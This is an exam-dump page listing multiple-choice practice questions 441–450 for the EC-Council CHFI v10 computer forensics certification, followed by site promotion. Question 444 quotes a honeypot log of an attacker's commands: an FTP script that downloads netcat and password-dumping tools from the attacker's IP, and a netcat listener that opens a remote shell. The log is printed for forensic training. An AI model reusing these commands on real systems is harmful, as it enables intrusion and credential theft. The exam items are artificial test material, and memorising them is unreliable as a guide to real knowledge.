Exam Details

  • Exam Code
    :312-49V10
  • Exam Name
    :EC-Council Certified Computer Hacking Forensic Investigator (V10)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :1006 Q&As
  • Last Updated
    :Apr 12, 2025

EC-COUNCIL EC-COUNCIL Certifications 312-49V10 Questions & Answers

  • Question 441:

    During the course of a corporate investigation, you find that an employee is committing a federal crime. Can the employer file a criminal complain with the police?

    A. Yes, and all evidence can be turned over to the police

    B. Yes, but only if you turn the evidence over to a district judge

    C. No, because the investigation was conducted without following standard police procedures

    D. No, because the investigation was conducted without a warrant

  • Question 442:

    You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.

    A. Routing Table

    B. Firewall log

    C. Configuration files

    D. Email Header

  • Question 443:

    You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacturer. While at the corporate office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO?

    A. The attorney-work-product rule

    B. Good manners

    C. Trade secrets

    D. ISO 17799

  • Question 444:

    The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

    He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

    "cmd1.exe /c open 213.116.251.162 >ftpcom"

    "cmd1.exe /c echo johna2k >>ftpcom"

    "cmd1.exe /c echo haxedj00 >>ftpcom"

    "cmd1.exe /c echo get nc.exe >>ftpcom"

    "cmd1.exe /c echo get pdump.exe >>ftpcom"

    "cmd1.exe /c echo get samdump.dll >>ftpcom"

    "cmd1.exe /c echo quit >>ftpcom"

    "cmd1.exe /c ftp -s:ftpcom"

    "cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

    What can you infer from the exploit given?

    A. It is a local exploit where the attacker logs in using username johna2k

    B. There are two attackers on the system ?johna2k and haxedj00

    C. The attack is a remote exploit and the hacker downloads three files

    D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

  • Question 445:

    Why is it a good idea to perform a penetration test from the inside?

    A. It is never a good idea to perform a penetration test from the inside

    B. It is easier to hack from the inside

    C. Because 70% of attacks are from inside the organization

    D. To attack a network from a hacker's perspective

  • Question 446:

    You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

    A. 8

    B. 1

    C. 4

    D. 2

  • Question 447:

    The following excerpt is taken from a honeypot log. The log captures activities across three days. There

    are several intrusion attempts; however, a few are successful.

    (Note: The objective of this question is to test whether the student can read basic information from log

    entries and interpret the nature of attack.)

    Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

    A. An IDS evasion technique

    B. A buffer overflow attempt

    C. A DNS zone transfer

    D. Data being retrieved from 63.226.81.13

  • Question 448:

    What is kept in the following directory? HKLM\SECURITY\Policy\Secrets

    A. IAS account names and passwords

    B. Service account passwords in plain text

    C. Local store PKI Kerberos certificates

    D. Cached password hashes for the past 20 users

  • Question 449:

    Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events?

    A. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media

    B. Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence

    C. Connect the target media; Delete the system for acquisition; Secure the evidence; Copy the media

    D. Secure the evidence; Prepare the system for acquisition; Connect the target media; Copy the media

  • Question 450:

    Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

    A. Only FTP traffic can be hijacked

    B. Only an HTTPS session can be hijacked

    C. HTTP protocol does not maintain session

    D. Only DNS traffic can be hijacked

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-49V10 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.